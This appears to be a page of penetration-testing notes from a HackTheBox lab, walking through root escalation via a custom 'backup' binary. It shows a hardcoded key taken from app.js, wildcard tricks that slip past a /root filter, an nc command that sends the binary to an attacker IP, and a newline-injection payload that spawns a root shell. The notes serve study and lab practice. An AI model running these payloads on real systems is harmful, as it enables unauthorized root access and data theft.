binaries

You found a custom Binary

"backup" example

  • From nodeHTB, mongodb

  • Custom app: /usr/local/bin/backup

  • Find a script that executes 'backup' and learn from it!

grep -Ri backup .               ..find references to 'backup'
find . | grep app.js            ..find our app
cat /var/www/myplace/app.js

const backup_key  = '45fac123...';
app.get('/api/admin/backup', function (req, res) {
    if (req.session.user && req.session.user.is_admin) {
      var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
      var backup = '';

backup -q key /dir   ..we learned how to execute!

backup /root

----------------
backup -q key /dir                                    ..how to execute!
/usr/local/bin/backup -q 45fac123... /tmp > out.txt   ..works!
base64 -d out.txt > decode-base64                     ..decode
file decode-base64                                    ..zip archive
unzip decode-base64                                   ..unzip

----------------
get root:
/usr/local/bin/backup -q 45fac123... /root > root.txt
base64 -d root.txt > /tmp/root
unzip root         ..failed
7z x rootdecoded   ..kinda worked?
cat root           ..failed

Avoid '/root' Filter with Splatting

----------------
Root Blocked
echo 'hello' > /tmp/root    ..decode/unzip/cat  ..fail
echo 'hello' > /tmp/*r00t   ..decode/unzip/cat  ..success

----------------
Splatting:
.backup -q secretkey /r**t/r**t.txt > root.txt
base64 -d root.txt > /tmp/secret
unzip secret
cat root/root.txt  ..success

----------------
myapp -q secretkey /r**t/r**t.txt > /tmp/encoded
myapp -q secretkey /r??t/roo?.txt > /tmp/encoded
myapp -q secretkey /r*t/r*t.txt > /tmp/encoded

Work Local

  • Send file to yourself.. You have better analysis tools!

nc $MyIP 4444 < /usr/bin/backup   ..send
nc -nlvp 4444 > backup            ..receive

md5sum backup                     ..confirm
chmod +x ./backup

strace

strace ./backup                    ..might be interesting
strace ./backup 1 2 3              ..works better with 3 arguments :)

ltrace ..found our app was filtering root and etc
ltrace /usr/local/bin/backup -q secretkey /root/root.txt

Analyze Assembly: radare2

> r2 backup  
aaa       ..analyze
afl       ..function list
vvv       ..visual mode
sym.main  ..scroll here
g g       ..get details
<space>   ..change view: nice call graph

./backup 1 2 3           ..App needs 3 Arguments!
strace ./backup 1 2 3    ..reads from /etc/myplace/keys

Analyze Assembly: binaryninja

  • Better graphics than radare2

  • But, doesnt show hex nicely

/opt/binaryninja/binaryninja

'main'  ..drill around follow the blacklist and trollface
'push'  ..keywords to watch for

Found redirects: /root $ ` ; | /etc // /

PrivEsc: Newline Character

/bin/myapp -q secretkey "xxx
> /bin/bash
> xxx"
# whoami ..root!

PrivEsc: Newline Character printf

  • Newline character in printf function can also give you root!

------------------
printf 'hi\nNewLine\nBye'  ..gives us new lines

------------------
/bin/myapp -q secretkey "$(printf 'xxx\n/bin/bash\nxxx')"
/bin/myapp -q secretkey "$(printf 'xxx\n/bin/sh\nxxx')"

Previous5 LootingNextBuffer Overflow

Last updated